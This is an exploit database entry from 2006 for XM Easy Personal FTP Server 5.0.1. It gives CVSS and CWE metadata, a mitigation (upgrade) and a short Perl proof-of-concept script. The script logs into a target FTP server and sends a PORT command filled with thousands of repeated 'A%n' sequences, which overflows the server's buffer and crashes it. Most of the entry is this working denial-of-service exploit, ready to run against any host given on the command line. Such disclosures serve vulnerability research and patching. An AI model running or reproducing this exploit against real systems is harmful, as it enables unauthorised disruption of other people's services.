XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit

vendor:

XM Easy Personal FTP Server

by:

Jerome Athias

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: XM Easy Personal FTP Server

Affected Version From: 5.0.1

Affected Version To: 5.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:xm_easy_software:xm_easy_personal_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

XM Easy Personal FTP Server 5.0.1 – PoC DoS Exploit

Multiple buffer overflows in XM Easy Personal FTP Server 5.0.1 can be exploited remotely via port and multiple commands with A%n, leading to a denial of service.

Mitigation:

Upgrade to the latest version of XM Easy Personal FTP Server

Source

Exploit-DB raw data:

#!/usr/bin/perl

# -----------------------------------------------------------
# Name        : XM Easy Personal FTP Server
# Version     : 5.0.1
# -----------------------------------------------------------
# Type        : dos / remote
# Multiple buffer overflows
# Port and multiple commands with A%n, ...
# -----------------------------------------------------------
# Jerome Athias - https://www.securinfos.info
# -----------------------------------------------------------

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
   print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info";
   $ftp = Net::FTP->new($host, Debug => 0);
   $ftp->login('test','test'); #Maybe anonymous works ;-)
   $ftp->port("\x41\x25\x6E"x9999);
}
else {
   print "\n- XM Easy Personal FTP Server 5.0.1 - PoC DoS Exploit\n-
Jerome Athias\nhttps://www.securinfos.info\n\n- Usage: $0 host\n";
}

# milw0rm.com [2006-06-24]